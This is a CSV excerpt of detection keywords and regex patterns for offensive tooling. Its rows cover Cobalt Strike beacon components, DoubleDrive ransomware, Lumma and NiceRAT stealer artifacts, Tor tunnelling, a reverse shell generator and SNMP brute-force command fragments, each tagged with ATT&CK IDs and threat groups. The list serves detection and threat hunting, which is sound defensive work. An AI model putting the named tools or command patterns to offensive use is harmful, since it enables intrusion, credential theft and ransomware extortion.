"*omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion*",".{0,1000}omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53896"
"*On_Demand_C2.*",".{0,1000}On_Demand_C2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","53897"
"*On-Demand_C2_BOF.*",".{0,1000}On\-Demand_C2_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","53898"
"*OnDemandC2Class.cs*",".{0,1000}OnDemandC2Class\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","53899"
"*onecloudemoji/CVE-2022-30190*",".{0,1000}onecloudemoji\/CVE\-2022\-30190.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","N/A","2","104","27","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z","53900"
"*onedrive_doubledrive.exe*",".{0,1000}onedrive_doubledrive\.exe.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","53901"
"*onedrive_doubledrive.py*",".{0,1000}onedrive_doubledrive\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","53902"
"*onedrive_enum.py*",".{0,1000}onedrive_enum\.py.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","53903"
"*onedrive_exports_version_dll.txt*",".{0,1000}onedrive_exports_version_dll\.txt.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","53904"
"*onedrive_ransomware.py*",".{0,1000}onedrive_ransomware\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","53905"
"*onedrive_user_enum.git*",".{0,1000}onedrive_user_enum\.git.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","53906"
"*OneDriveRansomware(CloudDriveRansomware)*",".{0,1000}OneDriveRansomware\(CloudDriveRansomware\).{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","53907"
"*One-Lin3r*",".{0,1000}One\-Lin3r.{0,1000}","offensive_tool_keyword","One-Lin3r","One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).","T1059 - T1003 - T1053","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/D4Vinci/One-Lin3r","1","1","#linux","N/A","N/A","10","1706","293","2024-10-14T19:18:37Z","2018-01-14T21:26:04Z","53908"
"*onesixtyone -c *snmp_default_pass.txt*",".{0,1000}onesixtyone\s\-c\s.{0,1000}snmp_default_pass\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53909"
"*onesixtyone -c *wordlists/*",".{0,1000}onesixtyone\s\-c\s.{0,1000}wordlists\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53910"
"*onesixtyone -i * -c*",".{0,1000}onesixtyone\s\-i\s.{0,1000}\s\-c.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","53911"
"*onesixtyone.1*",".{0,1000}onesixtyone\.1.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","53912"
"*onesixtyone.git*",".{0,1000}onesixtyone\.git.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","53913"
"*onionpipe --*",".{0,1000}onionpipe\s\-\-.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53914"
"*onionpipe *.onion:*",".{0,1000}onionpipe\s.{0,1000}\.onion\:.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53915"
"*onionpipe *:*~*",".{0,1000}onionpipe\s.{0,1000}\:.{0,1000}\~.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53916"
"*onionpipe /run/*",".{0,1000}onionpipe\s\/run\/.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53917"
"*onionpipe 8000*",".{0,1000}onionpipe\s8000.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53918"
"*onionpipe client new *",".{0,1000}onionpipe\sclient\snew\s.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53919"
"*onionpipe/secrets*",".{0,1000}onionpipe\/secrets.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53920"
"*onionpipe/tor*",".{0,1000}onionpipe\/tor.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53921"
"*onionpipe-darwin-amd64-static*",".{0,1000}onionpipe\-darwin\-amd64\-static.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53922"
"*onionpipe-linux-amd64-static*",".{0,1000}onionpipe\-linux\-amd64\-static.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","53923"
"*Online - Reverse Shell Generator*",".{0,1000}Online\s\-\sReverse\sShell\sGenerator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","53924"
"*online_brute.gz.torrent*",".{0,1000}online_brute\.gz\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","53926"
"*ookjlbkiijinhpmnjffcofjonbfbgaoc*",".{0,1000}ookjlbkiijinhpmnjffcofjonbfbgaoc.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53929"
"*Oops! Your files have been encrypted.*recover all your files safely*",".{0,1000}Oops!\sYour\sfiles\shave\sbeen\sencrypted\..{0,1000}recover\sall\syour\sfiles\ssafely.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","53930"
"*opcgpfmipidbgpenhmajoajpbobppdil*",".{0,1000}opcgpfmipidbgpenhmajoajpbobppdil.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53931"
"*Opedx765era Neoedx765n\\Usedx765er Daedx765ta*",".{0,1000}Opedx765era\sNeoedx765n\\\\Usedx765er\sDaedx765ta.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","53932"
"*Opedx765era Softwedx765are\\Opedx765era GX Staedx765ble*",".{0,1000}Opedx765era\sSoftwedx765are\\\\Opedx765era\sGX\sStaedx765ble.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","53933"
"*Opeedx765ra Softedx765ware\\Opedx765era Staedx765ble*",".{0,1000}Opeedx765ra\sSoftedx765ware\\\\Opedx765era\sStaedx765ble.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","53934"
"*openBeaconBrowser*",".{0,1000}openBeaconBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53938"
"*openBeaconBrowser*",".{0,1000}openBeaconBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53939"
"*openBeaconConsole*",".{0,1000}openBeaconConsole.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53940"
"*openBeaconConsole*",".{0,1000}openBeaconConsole.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53941"
